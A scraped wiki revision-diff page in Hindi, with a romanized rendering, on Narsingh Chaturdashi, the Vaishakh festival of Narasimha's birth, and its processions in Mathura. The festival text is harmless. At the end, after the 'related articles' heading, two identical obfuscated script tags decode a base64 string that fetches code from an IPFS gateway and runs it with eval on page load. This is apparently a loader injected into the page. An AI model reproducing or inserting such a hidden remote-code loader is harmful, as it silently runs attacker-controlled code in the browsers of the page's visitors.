Difference between revisions of "नृसिंह चतुर्दशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - 'त्यौहार' to 'त्योहार')
 
 
(12 intermediate revisions by 6 users not shown)
Line 1: Line 1:
 +
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 +
*[[वैशाख]] [[शुक्ल पक्ष]] की [[चतुर्दशी]] को नृसिंह जी का जन्मोत्सव मनाया जाता है और नृसिंह लीलाओं का आयोजन होता है।
 +
*[[मथुरा]] के विभिन्न मन्दिर एवं मौहल्लों से नृसिंह की वेशभूषा में नृसिंह निकलते हैं और हिरणयकश्यप का वध कर पूरे नगर या मौहल्ले में भ्रमण करते हैं।
  
==नृसिंह चतुर्दशी / Narsingh Chaturdashi==
+
{{main|नृसिंह जयंती|नृसिंह अवतार|नृसिंह द्वादशी}}
वैशाख शु0 14 को नृसिंह जी का जन्मोत्सव मनाया जाता है और नृसिंह लीलाओं का आयोजन होता है। [[मथुरा]] के विभिन्न मन्दिर एवं मौहल्लों से नृसिंह की वेशभूषा में नृसिंह निकलते हैं और हिरणयकश्यप का वध कर पूरे नगर या मौहल्ले में भ्रमण करते हैं।
 
  
<br />
+
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक=|माध्यमिक=|पूर्णता=|शोध}}
{{साँचा:पर्व और त्योहार}}
+
==संबंधित लेख==
 +
{{पर्व और त्योहार}}
 +
{{व्रत और उत्सव}}
 
[[Category:संस्कृति कोश]]
 
[[Category:संस्कृति कोश]]
 
[[Category:पर्व और त्योहार]]
 
[[Category:पर्व और त्योहार]]
 +
[[Category:व्रत और उत्सव]]
 
__INDEX__
 
__INDEX__

Latest revision as of 09:50, 22 May 2013

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • vaishakh shukl paksh ki chaturdashi ko nrisianh ji ka janmotsav manaya jata hai aur nrisianh lilaoan ka ayojan hota hai.
  • mathura ke vibhinn mandir evan mauhalloan se nrisianh ki veshabhoosha mean nrisianh nikalate haian aur hiranayakashyap ka vadh kar poore nagar ya mauhalle mean bhraman karate haian.
  1. REDIRECTsaancha:mukhy


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>